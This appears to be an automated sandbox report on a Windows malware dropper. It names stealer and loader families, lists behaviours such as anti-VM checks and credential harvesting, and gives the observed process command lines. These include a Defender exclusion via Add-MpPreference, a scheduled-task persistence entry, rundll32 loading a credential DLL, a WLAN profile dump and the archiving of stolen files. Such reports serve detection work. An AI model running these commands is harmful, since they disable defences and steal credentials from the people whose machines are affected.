Analysis Overview
SHA256
77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1
Threat Level: Known bad
The file 77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1 was found to be: Known bad.
Malicious Activity Summary
Windows security bypass
RisePro
Glupteba
Lumma Stealer
Detect ZGRat V1
RedLine payload
Glupteba payload
Amadey
ZGRat
Modifies firewall policy service
RedLine
Stealc
UAC bypass
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Modifies Windows Firewall
Blocklisted process makes network request
Stops running service(s)
Reads user/profile data of web browsers
Reads WinSCP keys stored on the system
Executes dropped EXE
Reads local data of messenger clients
Identifies Wine through registry keys
Themida packer
Windows security modification
Checks computer location settings
Loads dropped DLL
Checks BIOS information in registry
Reads data files stored by FTP clients
Checks whether UAC is enabled
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Enumerates connected drives
Checks installed software on the system
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Drops file in Program Files directory
Drops file in Windows directory
Checks for VirtualBox DLLs, possible anti-VM trick
Unsigned PE
Program crash
Enumerates physical storage devices
System policy modification
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Checks processor information in registry
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Checks SCSI registry key(s)
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Modifies data under HKEY_USERS
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies system certificate store
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-04-25 14:40
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-25 14:40
Reported
2024-04-25 14:42
Platform
win10v2004-20240226-en
Max time kernel
43s
Max time network
156s
Command Line
Signatures
Amadey
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Lumma Stealer
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
RisePro
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
Downloads MZ/PE file
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\1000013002\611b2ae010.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| N/A | N/A | C:\Users\Admin\1000013002\611b2ae010.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\611b2ae010.exe = "C:\\Users\\Admin\\1000013002\\611b2ae010.exe" | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e902973543.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000014001\\e902973543.exe" | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5312 set thread context of 5716 | N/A | C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 5440 set thread context of 5980 | N/A | C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\explorta.job | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| File created | C:\Windows\Tasks\chrosha.job | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133585296532696232" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{B622DF68-10F4-491A-A0EC-30A314A16EE1} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe
"C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe"
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe
"C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe"
C:\Users\Admin\1000013002\611b2ae010.exe
"C:\Users\Admin\1000013002\611b2ae010.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffd770b9758,0x7ffd770b9768,0x7ffd770b9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1820 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2248 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3184 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3216 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4560 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe
"C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4840 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4816 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5028 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5276 --field-trial-handle=1808,i,3428168854509103031,15954556880966478854,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5312 -ip 5312
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5440 -ip 5440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5312 -s 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 352
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6080 -ip 6080
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6080 -s 356
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=748 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\808065738166_Desktop.zip' -CompressionLevel Optimal
C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"
C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe
"C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe" -Force
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installg.bat" "
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Windows\SysWOW64\sc.exe
Sc delete GameServerClient
C:\Users\Admin\Pictures\K9EzU2hxB6e4QfvrMT7LnkFP.exe
"C:\Users\Admin\Pictures\K9EzU2hxB6e4QfvrMT7LnkFP.exe"
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService remove GameServerClient confirm
C:\Users\Admin\Pictures\dvziYrHzjJaIGccJldIN1TNj.exe
"C:\Users\Admin\Pictures\dvziYrHzjJaIGccJldIN1TNj.exe"
C:\Users\Admin\Pictures\S6gQXYO26TJ29VBYykARgxl8.exe
"C:\Users\Admin\Pictures\S6gQXYO26TJ29VBYykARgxl8.exe"
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService install GameServerClient "C:\Program Files (x86)\GameServerClient\GameServerClient.exe"
C:\Users\Admin\AppData\Local\Temp\u53k.0.exe
"C:\Users\Admin\AppData\Local\Temp\u53k.0.exe"
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService start GameServerClient
C:\Program Files (x86)\GameServerClient\GameService.exe
"C:\Program Files (x86)\GameServerClient\GameService.exe"
C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe
"C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe" --silent --allusers=0
C:\Users\Admin\Pictures\AUOJwzWUhuXoDRZSwm4I8Gsd.exe
"C:\Users\Admin\Pictures\AUOJwzWUhuXoDRZSwm4I8Gsd.exe"
C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe
C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x29c,0x2a0,0x2a4,0x274,0x2a8,0x6c42e1d0,0x6c42e1dc,0x6c42e1e8
C:\Users\Admin\AppData\Local\Temp\u53k.2\run.exe
"C:\Users\Admin\AppData\Local\Temp\u53k.2\run.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\x1QvVUZFYeu0W5aS8JUXZFtT.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\x1QvVUZFYeu0W5aS8JUXZFtT.exe" --version
C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe
"C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=6740 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240425144159" --session-guid=f4cbfaa2-6eaf-471f-8e79-eb81698f826c --server-tracking-blob="MjAyMTM2YTAxMGY5N2I3M2E1MTRlOWNjZjAxMjU4NTI2MGU4OTgyYTE2MTU1Yzg3NmQ5NDU1Mzc1MTNlZGVmODp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MDU2MDk1LjI2MDMiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMDk3NzI2ZWYtMDBhNC00ZWZmLWEyMzYtZWFmYjlkMDdmNDBiIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=DC04000000000000
